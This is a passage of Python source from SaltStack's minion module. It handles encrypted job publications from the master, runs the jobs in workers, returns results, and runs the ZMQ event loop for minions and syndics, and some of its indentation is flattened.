                log.debug('Waiting {0} seconds to re-authenticate'.format(reauth_delay))
                time.sleep(reauth_delay)
            self.authenticate()
            # Second decode attempt after re-auth; an exception here is fatal
            data = self.crypticle.loads(load)

        # Verify that the publication is valid
        if 'tgt' not in data or 'jid' not in data or 'fun' not in data \
                or 'arg' not in data:
            return
        # Verify that the publication applies to this minion

        # It's important to note that the master does some pre-processing
        # to determine which minions to send a request to. So for example,
        # a "salt -G 'grain_key:grain_val' test.ping" will invoke some
        # pre-processing on the master and this minion should not see the
        # publication if the master does not determine that it should.
        if 'tgt_type' in data:
            match_func = getattr(self.matcher,
                                 '{0}_match'.format(data['tgt_type']), None)
            if match_func is None or not match_func(data['tgt']):
                return
        else:
            if not self.matcher.glob_match(data['tgt']):
                return

        # If the minion does not have the function, don't execute,
        # this prevents minions that could not load a minion module
        # from returning a predictable exception
        #if data['fun'] not in self.functions:
        #    return
        if 'user' in data:
            log.info(
                'User {0[user]} Executing command {0[fun]} with jid '
                '{0[jid]}'.format(data)
            )
        else:
            log.info(
                'Executing command {0[fun]} with jid {0[jid]}'.format(data)
            )
        log.debug('Command details {0}'.format(data))
        self._handle_decoded_payload(data)
def _handle_pub(self, load):
'''
Handle public key payloads
'''
pass
def _handle_clear(self, load):
'''
Handle un-encrypted transmissions
'''
pass
    def _handle_decoded_payload(self, data):
        '''
        Override this method if you wish to handle the decoded data
        differently.

        Spawns a worker (process or thread, per the 'multiprocessing' opt)
        running _thread_return / _thread_multi_return for the decoded job.
        '''
        if isinstance(data['fun'], string_types):
            if data['fun'] == 'sys.reload_modules':
                # Reload in-process so the new modules are visible to the
                # scheduler as well
                self.functions, self.returners = self._load_modules()
                self.schedule.functions = self.functions
                self.schedule.returners = self.returners
        # A list/tuple of functions means a compound (multi-function) job
        if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
            target = Minion._thread_multi_return
        else:
            target = Minion._thread_return
        # We stash an instance references to allow for the socket
        # communication in Windows. You can't pickle functions, and thus
        # python needs to be able to reconstruct the reference on the other
        # side.
        instance = self
        if self.opts['multiprocessing']:
            if sys.platform.startswith('win'):
                # let python reconstruct the minion on the other side if we're
                # running on windows
                instance = None
            process = multiprocessing.Process(
                target=target, args=(instance, self.opts, data)
            )
        else:
            process = threading.Thread(
                target=target, args=(instance, self.opts, data),
                name=data['jid']
            )
        process.start()
        # NOTE(review): on non-Windows platforms the worker is joined here,
        # so this handler blocks until the job finishes — presumably
        # intentional (daemonize_if forks in the multiprocessing case);
        # confirm.
        if not sys.platform.startswith('win'):
            process.join()
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing']:
salt.utils.daemonize_if(opts)
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
func = minion_instance.functions[data['fun']]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
sys.modules[func.__module__].__context__['retcode'] = 0
return_data = func(*args, **kwargs)
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, list):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = sys.modules[func.__module__].__context__.get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for {0!r} not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in {0!r} had a problem: {1}'.format(
function_name,
exc
),
exc_info=log.isEnabledFor(logging.DEBUG)
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing {0!r}: {1}'.format(
function_name,
exc
),
exc_info=log.isEnabledFor(logging.DEBUG)
)
ret['return'] = 'ERROR executing {0!r}: {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
trb = traceback.format_exc()
aspec = salt.utils.get_function_argspec(
minion_instance.functions[data['fun']]
)
msg = ('TypeError encountered executing {0}: {1}. See '
'debug log for more info. Possibly a missing '
'arguments issue: {2}').format(function_name,
exc,
aspec)
log.warning(msg, exc_info=log.isEnabledFor(logging.DEBUG))
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info=log.isEnabledFor(logging.DEBUG))
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = '{0!r} is not available.'.format(function_name)
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
minion_instance._return_pub(ret)
if data['ret']:
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
    '''
    This method should be used as a threading target, start the actual
    minion side execution.

    Runs every function listed in ``data['fun']`` (with the matching
    entry of ``data['arg']``), collects per-function results/success
    flags into a single return dict, publishes it back to the master
    and feeds any configured returners.
    '''
    # this seems awkward at first, but it's a workaround for Windows
    # multiprocessing communication: the instance cannot be pickled
    # across the process boundary, so rebuild it here if needed.
    if not minion_instance:
        minion_instance = cls(opts)
    ret = {
        'return': {},
        'success': {},
    }
    for ind in range(0, len(data['fun'])):
        # Mark as failed up front; flipped to True only on clean return.
        ret['success'][data['fun'][ind]] = False
        try:
            func = minion_instance.functions[data['fun'][ind]]
            args, kwargs = load_args_and_kwargs(
                func,
                data['arg'][ind],
                data)
            ret['return'][data['fun'][ind]] = func(*args, **kwargs)
            ret['success'][data['fun'][ind]] = True
        except Exception as exc:
            # A failing function must not abort the remaining ones; store
            # the traceback as that function's return value instead.
            trb = traceback.format_exc()
            log.warning(
                'The minion function caused an exception: {0}'.format(
                    exc
                )
            )
            ret['return'][data['fun'][ind]] = trb
    ret['jid'] = data['jid']
    ret['fun'] = data['fun']
    ret['fun_args'] = data['arg']
    minion_instance._return_pub(ret)
    if data['ret']:
        # Deliver to each requested returner; set() de-duplicates names.
        for returner in set(data['ret'].split(',')):
            ret['id'] = opts['id']
            try:
                minion_instance.returners['{0}.returner'.format(
                    returner
                )](ret)
            except Exception as exc:
                # Returner failures are logged, never fatal to the job.
                log.error(
                    'The return failed for job {0} {1}'.format(
                        data['jid'],
                        exc
                    )
                )
def _return_pub(self, ret, ret_cmd='_return'):
    '''
    Return the data from the executed command to the master server.

    ret     -- job result dict; 'jid'/'fun' (or the '__jid__'/'__fun__'
               aliases used by the syndic) identify the job.
    ret_cmd -- master-side command that receives the payload; the
               '_syndic_return' form ships an aggregated syndic load.

    Returns the master's reply, or '' when the request timed out.
    '''
    jid = ret.get('jid', ret.get('__jid__'))
    fun = ret.get('fun', ret.get('__fun__'))
    if self.opts['multiprocessing']:
        # Remove the per-job marker file created for the forked worker.
        fn_ = os.path.join(self.proc_dir, jid)
        if os.path.isfile(fn_):
            try:
                os.remove(fn_)
            except (OSError, IOError):
                # The file is gone already
                pass
    log.info('Returning information for job: {0}'.format(jid))
    channel = salt.transport.Channel.factory(self.opts)
    if ret_cmd == '_syndic_return':
        # Syndic load: keep the job metadata at the top level and copy
        # only the non-dunder keys into the 'return' sub-dict.
        load = {'cmd': ret_cmd,
                'id': self.opts['id'],
                'jid': jid,
                'fun': fun,
                'load': ret.get('__load__')}
        load['return'] = {}
        for key, value in ret.items():
            if key.startswith('__'):
                continue
            load['return'][key] = value
    else:
        load = {'cmd': ret_cmd,
                'id': self.opts['id']}
        for key, value in ret.items():
            load[key] = value
        if 'out' in ret:
            if isinstance(ret['out'], string_types):
                load['out'] = ret['out']
            else:
                log.error('Invalid outputter {0}. This is likely a bug.'
                          .format(ret['out']))
        else:
            # No explicit outputter; fall back to the one advertised by
            # the executed module function, when present and sane.
            try:
                oput = self.functions[fun].__outputter__
            except (KeyError, AttributeError, TypeError):
                pass
            else:
                if isinstance(oput, string_types):
                    load['out'] = oput
    if self.opts['cache_jobs']:
        # Local job cache has been enabled
        fn_ = os.path.join(
            self.opts['cachedir'],
            'minion_jobs',
            load['jid'],
            'return.p')
        jdir = os.path.dirname(fn_)
        if not os.path.isdir(jdir):
            os.makedirs(jdir)
        # Use a context manager so the cache file handle is always
        # closed (the previous code leaked the handle on interpreters
        # without eager refcounting).
        with salt.utils.fopen(fn_, 'w+b') as fp_:
            fp_.write(self.serial.dumps(ret))
    try:
        ret_val = channel.send(load)
    except SaltReqTimeoutError:
        msg = ('The minion failed to return the job information for job '
               '{0}. This is often due to the master being shut down or '
               'overloaded. If the master is running consider increasing '
               'the worker_threads value.').format(jid)
        # log.warn is a deprecated alias; use warning().
        log.warning(msg)
        return ''
    if isinstance(ret_val, string_types) and not ret_val:
        # The master AES key has changed, reauth and resend once.
        self.authenticate()
        ret_val = channel.send(load)
    log.trace('ret_val = {0}'.format(ret_val))
    return ret_val
def _state_run(self):
    '''
    Run the state job configured through ``startup_states`` in the minion
    config file, if any, by synthesizing a decoded job payload.
    '''
    if not self.opts['startup_states']:
        return
    # Fake a job payload; 'req' is the jid used for config-driven runs.
    job = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
    mode = self.opts['startup_states']
    if mode == 'sls':
        job['fun'] = 'state.sls'
        job['arg'] = [self.opts['sls_list']]
    elif mode == 'top':
        job['fun'] = 'state.top'
        job['arg'] = [self.opts['top_file']]
    else:
        # Any other value means a full highstate.
        job['fun'] = 'state.highstate'
        job['arg'] = []
    self._handle_decoded_payload(job)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
    '''
    Install a recurring scheduled event that fires a grains refresh so a
    master learns about changes in this minion's grains.

    :param refresh_interval_in_minutes: firing period, in minutes
    :return: None
    '''
    schedule = self.opts.setdefault('schedule', {})
    if '__update_grains' in schedule:
        # Watcher already installed; keep the existing entry.
        return
    schedule['__update_grains'] = {
        'function': 'event.fire',
        'args': [{}, 'grains_refresh'],
        'minutes': refresh_interval_in_minutes,
    }
def _set_tcp_keepalive(self):
    '''
    Apply the TCP keepalive settings from the config to the ZMQ socket.
    No-op when the pyzmq build predates TCP_KEEPALIVE support.
    '''
    if not hasattr(zmq, 'TCP_KEEPALIVE'):
        return
    # Same order as the config options; each maps 1:1 to a socket option.
    for zmq_opt, conf_key in (
            (zmq.TCP_KEEPALIVE, 'tcp_keepalive'),
            (zmq.TCP_KEEPALIVE_IDLE, 'tcp_keepalive_idle'),
            (zmq.TCP_KEEPALIVE_CNT, 'tcp_keepalive_cnt'),
            (zmq.TCP_KEEPALIVE_INTVL, 'tcp_keepalive_intvl')):
        self.socket.setsockopt(zmq_opt, self.opts[conf_key])
def _set_reconnect_ivl(self):
    '''
    Set the ZMQ reconnect interval, optionally randomized between
    recon_default and recon_default + recon_max to avoid reconnect
    stampedes against the master.
    '''
    lower = self.opts['recon_default']
    recon_delay = lower
    if self.opts['recon_randomize']:
        upper = self.opts['recon_default'] + self.opts['recon_max']
        recon_delay = randint(lower, upper)
        log.debug("Generated random reconnect delay between '{0}ms' and '{1}ms' ({2})".format(
            lower,
            upper,
            recon_delay)
        )
    log.debug("Setting zmq_reconnect_ivl to '{0}ms'".format(recon_delay))
    self.socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
def _set_reconnect_ivl_max(self):
    # Cap ZMQ's exponential reconnect backoff, when the binding has it.
    if hasattr(zmq, 'RECONNECT_IVL_MAX'):
        # NOTE(review): the log line reports recon_default + recon_max
        # while the socket option is set to recon_max only — one of the
        # two looks wrong; confirm the intended ceiling.
        log.debug("Setting zmq_reconnect_ivl_max to '{0}ms'".format(
            self.opts['recon_default'] + self.opts['recon_max'])
        )
        self.socket.setsockopt(
            zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
        )
def _set_ipv4only(self):
    '''
    Make the socket dual-stack when IPv6 is enabled in the config.
    '''
    ipv6_enabled = self.opts['ipv6'] is True
    if ipv6_enabled and hasattr(zmq, 'IPV4ONLY'):
        # Clearing IPV4ONLY lets the IPv6 socket serve IPv4 traffic too.
        self.socket.setsockopt(zmq.IPV4ONLY, 0)
def _fire_master_minion_start(self):
    '''
    Tell the master this minion came up, once on the legacy
    'minion_start' tag and once on the name-spaced minion/<id>/start tag.
    '''
    for start_tag in ('minion_start',
                      tagify([self.opts['id'], 'start'], 'minion')):
        # asctime() is evaluated per event, matching the original
        # behaviour of two separate timestamps.
        self._fire_master(
            'Minion {0} started at {1}'.format(
                self.opts['id'],
                time.asctime()
            ),
            start_tag
        )
def _setsockopts(self):
    # Subscribe to everything the master publishes and present the
    # minion id as the ZMQ identity.
    self.socket.setsockopt(zmq.SUBSCRIBE, '')
    self.socket.setsockopt(zmq.IDENTITY, self.opts['id'])
    # Transport tuning; callers in this file invoke this before the
    # socket connects to the master publisher.
    self._set_ipv4only()
    self._set_reconnect_ivl_max()
    self._set_tcp_keepalive()
@property
def master_pub(self):
    '''
    The tcp:// URL of the master publish socket this minion subscribes to.
    '''
    endpoint = 'tcp://{ip}:{port}'
    return endpoint.format(ip=self.opts['master_ip'],
                           port=self.publish_port)
def authenticate(self, timeout=60, safe=True):
    '''
    Authenticate with the master, this method breaks the functional
    paradigm, it will update the master information from a fresh sign
    in, signing in can occur as often as needed to keep up with the
    revolving master AES key.

    timeout -- seconds allowed per sign-in attempt
    safe    -- retry on sign-in errors instead of raising; may be
               overridden by the 'auth_safemode' config option
    '''
    log.debug(
        'Attempting to authenticate with the Salt Master at {0}'.format(
            self.opts['master_ip']
        )
    )
    auth = salt.crypt.Auth(self.opts)
    self.tok = auth.gen_token('salt')
    acceptance_wait_time = self.opts['acceptance_wait_time']
    acceptance_wait_time_max = self.opts['acceptance_wait_time_max']
    if not acceptance_wait_time_max:
        # Unset/zero max means no backoff growth beyond the base wait.
        acceptance_wait_time_max = acceptance_wait_time
    tries = self.opts.get('auth_tries', 1)
    safe = self.opts.get('auth_safemode', safe)
    while True:
        creds = auth.sign_in(timeout, safe, tries)
        if creds == 'full':
            # Passed straight through to the caller untouched.
            # NOTE(review): semantics of the 'full' sentinel are defined
            # in salt.crypt.Auth.sign_in — confirm before relying on it.
            return creds
        elif creds != 'retry':
            log.info('Authentication with master successful!')
            break
        # 'retry': our key is not accepted yet. Wait, then double the
        # wait (capped at acceptance_wait_time_max) and sign in again.
        log.info('Waiting for minion key to be accepted by the master.')
        if acceptance_wait_time:
            log.info('Waiting {0} seconds before retry.'.format(acceptance_wait_time))
            time.sleep(acceptance_wait_time)
        if acceptance_wait_time < acceptance_wait_time_max:
            acceptance_wait_time += acceptance_wait_time
            log.debug('Authentication wait time is {0}'.format(acceptance_wait_time))
    self.aes = creds['aes']
    if self.opts.get('syndic_master_publish_port'):
        self.publish_port = self.opts.get('syndic_master_publish_port')
    else:
        self.publish_port = creds['publish_port']
    self.crypticle = salt.crypt.Crypticle(self.opts, self.aes)
def module_refresh(self, force_refresh=False):
    '''
    Reload execution modules and returners, then hand the fresh tables
    to the scheduler so scheduled jobs pick them up too.
    '''
    functions, returners = self._load_modules(force_refresh)
    self.functions = functions
    self.returners = returners
    self.schedule.functions = functions
    self.schedule.returners = returners
def pillar_refresh(self, force_refresh=False):
    '''
    Recompile pillar data from the master, then refresh the loaded
    modules so pillar-driven modules see the new values.
    '''
    pillar = salt.pillar.get_pillar(
        self.opts,
        self.opts['grains'],
        self.opts['id'],
        self.opts['environment'],
    )
    self.opts['pillar'] = pillar.compile_pillar()
    self.module_refresh(force_refresh)
def manage_schedule(self, package):
    '''
    Apply a schedule-management operation delivered over the minion
    event bus.

    package -- raw event package; its data carries a 'func' key naming
               the operation (delete/add/modify/enable/disable/
               enable_job/disable_job/reload) plus that operation's
               arguments. Unknown funcs are silently ignored.
    '''
    tag, data = salt.utils.event.MinionEvent.unpack(package)
    func = data.get('func', None)
    if func == 'delete':
        self.schedule.delete_job(data.get('job', None))
    elif func == 'add':
        # NOTE: any 'name' in the payload is ignored here (the old code
        # fetched it into an unused local); add_job() takes the whole
        # schedule dict.
        self.schedule.add_job(data.get('schedule', None))
    elif func == 'modify':
        self.schedule.modify_job(
            data.get('name', None),
            data.get('schedule', None),
            data.get('where', None))
    elif func == 'enable':
        self.schedule.enable_schedule()
    elif func == 'disable':
        self.schedule.disable_schedule()
    elif func == 'enable_job':
        self.schedule.enable_job(
            data.get('job', None),
            data.get('where', None))
    elif func == 'disable_job':
        self.schedule.disable_job(
            data.get('job', None),
            data.get('where', None))
    elif func == 'reload':
        self.schedule.reload(data.get('schedule', None))
def environ_setenv(self, package):
    '''
    Set the salt-minion main process environment according to the data
    contained in the minion event data. Returns False when the event
    carries no 'environ' mapping, otherwise the setenv result.
    '''
    tag, data = salt.utils.event.MinionEvent.unpack(package)
    environ = data.get('environ', None)
    if environ is None:
        return False
    # Imported lazily, mirroring the original local import.
    import salt.modules.environ as mod_environ
    return mod_environ.setenv(
        environ,
        data.get('false_unsets', False),
        data.get('clear_all', False),
    )
def clean_die(self, signum, frame):
    '''
    Python does not handle the SIGTERM cleanly, if it is signaled exit
    the minion process cleanly

    signum -- delivered signal number (unused)
    frame  -- interrupted stack frame (unused)
    '''
    # Flag the main tune_in loop to stop before exiting the process.
    self._running = False
    exit(0)
def _pre_tune(self):
    '''
    Set the minion running flag and issue the appropriate warnings if
    the minion cannot be started or is already running

    _running is tri-state: None = never started (start now),
    False = scheduled to stop (refuse), True = already running (refuse).
    '''
    if self._running is None:
        self._running = True
    elif self._running is False:
        log.error(
            'This {0} was scheduled to stop. Not running '
            '{0}.tune_in()'.format(self.__class__.__name__)
        )
        return
    elif self._running is True:
        log.error(
            'This {0} is already running. Not running '
            '{0}.tune_in()'.format(self.__class__.__name__)
        )
        return

    try:
        log.info(
            '{0} is starting as user \'{1}\''.format(
                self.__class__.__name__,
                salt.utils.get_user()
            )
        )
    except Exception as err:
        # Only windows is allowed to fail here. See #3189. Log as debug in
        # that case. Else, error.
        log.log(
            salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
            'Failed to get the user who is starting {0}'.format(
                self.__class__.__name__
            ),
            exc_info=err
        )
# Main Minion Tune In
def tune_in(self):
    '''
    Lock onto the publisher. This is the main event loop for the minion.
    Sets up the SUB socket to the master, the local event sockets and the
    signal handlers, then polls until _running is flipped off.
    :rtype : None
    '''
    self._pre_tune()

    # Properly exit if a SIGTERM is signalled
    signal.signal(signal.SIGTERM, self.clean_die)

    log.debug('Minion {0!r} trying to tune in'.format(self.opts['id']))

    self._prepare_minion_event_system()

    self.socket = self.context.socket(zmq.SUB)

    # Socket options must be applied before connect().
    self._set_reconnect_ivl()
    self._setsockopts()

    self.socket.connect(self.master_pub)
    self.poller.register(self.socket, zmq.POLLIN)
    self.poller.register(self.epull_sock, zmq.POLLIN)

    self._fire_master_minion_start()
    log.info('Minion is ready to receive requests!')

    # Make sure to gracefully handle SIGUSR1
    enable_sigusr1_handler()

    # Make sure to gracefully handle CTRL_LOGOFF_EVENT
    salt.utils.enable_ctrl_logoff_handler()

    # On first startup execute a state run if configured to do so
    self._state_run()
    if self.opts['startup_states']:
        startup_sleep_length = 0.5
        log.debug('Sleeping for {0}s before running startup states'.format(startup_sleep_length))
        time.sleep(startup_sleep_length)

    loop_interval = int(self.opts['loop_interval'])

    try:
        if self.opts['grains_refresh_every']:  # If exists and is not zero. In minutes, not seconds!
            if self.opts['grains_refresh_every'] > 1:
                log.debug(
                    'Enabling the grains refresher. Will run every {0} minutes.'.format(
                        self.opts['grains_refresh_every'])
                )
            else:  # Clean up minute vs. minutes in log message
                log.debug(
                    'Enabling the grains refresher. Will run every {0} minute.'.format(
                        self.opts['grains_refresh_every'])
                )
            self._refresh_grains_watcher(
                abs(self.opts['grains_refresh_every'])
            )
    except Exception as exc:
        log.error(
            'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
                exc)
        )

    # ping_interval is configured in minutes; convert to seconds.
    ping_interval = self.opts.get('ping_interval', 0) * 60
    ping_at = None

    while self._running is True:
        loop_interval = self.process_schedule(self, loop_interval)
        try:
            socks = self._do_poll(loop_interval)

            if ping_interval > 0:
                # Reset the deadline while traffic flows; ping only after
                # a quiet period longer than ping_interval.
                if socks or not ping_at:
                    ping_at = time.time() + ping_interval
                if ping_at < time.time():
                    log.debug('Ping master')
                    self._fire_master('ping', 'minion_ping')
                    ping_at = time.time() + ping_interval

            self._do_socket_recv(socks)

            # Check the event system: dispatch local events by tag prefix.
            if socks.get(self.epull_sock) == zmq.POLLIN:
                package = self.epull_sock.recv(zmq.NOBLOCK)
                log.debug('Handling event {0!r}'.format(package))
                try:
                    if package.startswith('module_refresh'):
                        self.module_refresh()
                    elif package.startswith('pillar_refresh'):
                        self.pillar_refresh()
                    elif package.startswith('manage_schedule'):
                        self.manage_schedule(package)
                    elif package.startswith('grains_refresh'):
                        # Only recompile pillar when the grains actually
                        # changed since the last refresh.
                        if self.grains_cache != self.opts['grains']:
                            self.pillar_refresh(force_refresh=True)
                            self.grains_cache = self.opts['grains']
                    elif package.startswith('environ_setenv'):
                        self.environ_setenv(package)
                    elif package.startswith('fire_master'):
                        tag, data = salt.utils.event.MinionEvent.unpack(package)
                        log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
                        self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
                    elif package.startswith('__master_disconnect'):
                        log.debug('handling master disconnect')
                        self.epub_sock.send(package)
                except Exception:
                    log.debug('Exception while handling events', exc_info=True)
            # Add an extra fallback in case a forked process leaks through
            multiprocessing.active_children()
        except zmq.ZMQError as exc:
            # The interrupt caused by python handling the
            # SIGCHLD. Throws this error with errno == EINTR.
            # Nothing to receive on the zmq socket throws this error
            # with EAGAIN.
            # Both are safe to ignore
            if exc.errno != errno.EAGAIN and exc.errno != errno.EINTR:
                log.critical('Unexpected ZMQError while polling minion',
                             exc_info=True)
            continue
        except SaltClientError:
            raise
        except Exception:
            log.critical(
                'An exception occurred while polling the minion',
                exc_info=True
            )
def tune_in_no_block(self):
    '''
    Executes the tune_in sequence but omits extra logging and the
    management of the event bus assuming that these are handled outside
    the tune_in sequence

    This is a generator: it yields True after each recovered error so an
    external loop can drive/interleave the polling.
    '''
    self._pre_tune()
    self._init_context_and_poller()

    self.socket = self.context.socket(zmq.SUB)
    self._setsockopts()
    self.socket.connect(self.master_pub)
    self.poller.register(self.socket, zmq.POLLIN)

    self._fire_master_minion_start()

    loop_interval = int(self.opts['loop_interval'])

    # On first startup execute a state run if configured to do so
    self._state_run()
    time.sleep(.5)

    while self._running is True:
        try:
            socks = self._do_poll(loop_interval)
            self._do_socket_recv(socks)
            # Check the event system
        except zmq.ZMQError:
            # If a zeromq error happens recover
            yield True
        except Exception:
            log.critical(
                'An exception occurred while polling the minion',
                exc_info=True
            )
            yield True
def _do_poll(self, loop_interval):
    '''
    Poll all registered sockets for up to loop_interval seconds and
    return a {socket: event-mask} dict.
    '''
    log.trace('Check main poller timeout {0}'.format(loop_interval))
    # zmq pollers take milliseconds.
    events = self.poller.poll(loop_interval * 1000)
    return dict(events)
def _do_socket_recv(self, socks):
    '''
    If the master publish socket has data pending, receive one message,
    deserialize it and hand it to the payload handler.
    '''
    if socks.get(self.socket) != zmq.POLLIN:
        return
    payload = self.serial.loads(self.socket.recv(zmq.NOBLOCK))
    log.trace('Handling payload')
    self._handle_payload(payload)
def destroy(self):
    '''
    Tear down the minion: stop the main loop and close every ZMQ socket
    and the context. Each close is guarded by a .closed check, so
    calling destroy() repeatedly is safe.
    '''
    self._running = False
    if getattr(self, 'poller', None) is not None:
        # NOTE(review): poller.sockets is a dict in some pyzmq versions
        # and a list of (socket, flags) pairs in others; both shapes are
        # handled here.
        if isinstance(self.poller.sockets, dict):
            for socket in self.poller.sockets.keys():
                if socket.closed is False:
                    socket.close()
                self.poller.unregister(socket)
        else:
            for socket in self.poller.sockets:
                if socket[0].closed is False:
                    socket[0].close()
                self.poller.unregister(socket[0])
    # Close the event publish/pull pair and the master SUB socket before
    # terminating the context.
    if hasattr(self, 'epub_sock') and self.epub_sock.closed is False:
        self.epub_sock.close()
    if hasattr(self, 'epull_sock') and self.epull_sock.closed is False:
        self.epull_sock.close()
    if hasattr(self, 'socket') and self.socket.closed is False:
        self.socket.close()
    if hasattr(self, 'context') and self.context.closed is False:
        self.context.term()
def __del__(self):
    # Best-effort cleanup on garbage collection; destroy() guards each
    # close with a .closed check, so an earlier explicit call is fine.
    self.destroy()
class Syndic(Minion):
    '''
    Make a Syndic minion, this minion will use the minion keys on the
    master to authenticate with a higher level master.

    The syndic subscribes to the higher-level master's publisher,
    republishes the jobs through its local master, and aggregates the
    resulting returns/events to forward them back up.
    '''
    def __init__(self, opts):
        self._syndic_interface = opts.get('interface')
        self._syndic = True
        # Poll frequently: the syndic is a forwarding loop.
        opts['loop_interval'] = 1
        super(Syndic, self).__init__(opts)
        # Gives access to the local master's returners (job cache reads).
        self.mminion = salt.minion.MasterMinion(opts)

    def _handle_aes(self, load, sig=None):
        '''
        Takes the AES encrypted load, decrypts it, and runs the encapsulated
        instructions
        '''
        # If the AES authentication has changed, re-authenticate
        try:
            data = self.crypticle.loads(load)
        except AuthenticationError:
            self.authenticate()
            data = self.crypticle.loads(load)
        # Verify that the publication is valid
        if 'tgt' not in data or 'jid' not in data or 'fun' not in data \
                or 'to' not in data or 'arg' not in data:
            return
        # 'to' is the remaining syndic hop count; decrement per hop.
        data['to'] = int(data['to']) - 1
        if 'user' in data:
            log.debug(
                'User {0[user]} Executing syndic command {0[fun]} with '
                'jid {0[jid]}'.format(
                    data
                )
            )
        else:
            log.debug(
                'Executing syndic command {0[fun]} with jid {0[jid]}'.format(
                    data
                )
            )
        log.debug('Command details: {0}'.format(data))
        self._handle_decoded_payload(data)

    def _handle_decoded_payload(self, data):
        '''
        Override this method if you wish to handle the decoded data
        differently.
        '''
        self.syndic_cmd(data)

    def syndic_cmd(self, data):
        '''
        Take the now clear load and forward it on to the client cmd
        '''
        # Set up default tgt_type
        if 'tgt_type' not in data:
            data['tgt_type'] = 'glob'
        # Send out the publication
        self.local.pub(data['tgt'],
                       data['fun'],
                       data['arg'],
                       data['tgt_type'],
                       data['ret'],
                       data['jid'],
                       data['to'])

    # Syndic Tune In
    def tune_in(self):
        '''
        Lock onto the publisher. This is the main event loop for the syndic
        '''
        # Instantiate the local client
        self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
        self.local.event.subscribe('')
        self.local.opts['interface'] = self._syndic_interface

        signal.signal(signal.SIGTERM, self.clean_die)
        log.debug('Syndic {0!r} trying to tune in'.format(self.opts['id']))

        self.context = zmq.Context()

        # Start with the publish socket
        # Share the poller with the event object
        self.poller = self.local.event.poller
        self.socket = self.context.socket(zmq.SUB)
        self.socket.setsockopt(zmq.SUBSCRIBE, '')
        self.socket.setsockopt(zmq.IDENTITY, self.opts['id'])
        self._set_reconnect_ivl_max()
        self._set_tcp_keepalive()
        self.socket.connect(self.master_pub)
        self.poller.register(self.socket, zmq.POLLIN)
        # Send an event to the master that the minion is live, on both
        # the legacy and the name-spaced tag.
        self._fire_master(
            'Syndic {0} started at {1}'.format(
                self.opts['id'],
                time.asctime()
            ),
            'syndic_start'
        )
        self._fire_master(
            'Syndic {0} started at {1}'.format(
                self.opts['id'],
                time.asctime()
            ),
            tagify([self.opts['id'], 'start'], 'syndic'),
        )

        # Make sure to gracefully handle SIGUSR1
        enable_sigusr1_handler()

        loop_interval = int(self.opts['loop_interval'])
        self._reset_event_aggregation()
        while True:
            try:
                # Do all the maths in seconds
                timeout = loop_interval
                if self.event_forward_timeout is not None:
                    # Wake up no later than the pending forward deadline.
                    timeout = min(timeout,
                                  self.event_forward_timeout - time.time())
                if timeout >= 0:
                    log.trace('Polling timeout: %f', timeout)
                    socks = dict(self.poller.poll(timeout * 1000))
                else:
                    # This shouldn't really happen.
                    # But there's no harm being defensive
                    log.warning('Negative timeout in syndic main loop')
                    socks = {}
                if socks.get(self.socket) == zmq.POLLIN:
                    self._process_cmd_socket()
                if socks.get(self.local.event.sub) == zmq.POLLIN:
                    self._process_event_socket()
                if (self.event_forward_timeout is not None and
                        self.event_forward_timeout < time.time()):
                    self._forward_events()
            # We don't handle ZMQErrors like the other minions
            # I've put explicit handling around the receive calls
            # in the process_*_socket methods. If we see any other
            # errors they may need some kind of handling so log them
            # for now.
            except Exception:
                log.critical(
                    'An exception occurred while polling the syndic',
                    exc_info=True
                )

    def _process_cmd_socket(self):
        # Receive one publication from the higher-level master.
        try:
            payload = self.serial.loads(self.socket.recv(zmq.NOBLOCK))
        except zmq.ZMQError as e:
            # Swallow errors for bad wakeups or signals needing processing
            # NOTE(review): when EAGAIN/EINTR is swallowed, 'payload' is
            # never bound and the _handle_payload call below would raise
            # NameError — confirm whether that path can actually trigger.
            if e.errno != errno.EAGAIN and e.errno != errno.EINTR:
                raise
        log.trace('Handling payload')
        self._handle_payload(payload)

    def _reset_event_aggregation(self):
        # Aggregation buffers: per-jid return dicts, raw pass-through
        # events, and the deadline for the next forward to the master.
        self.jids = {}
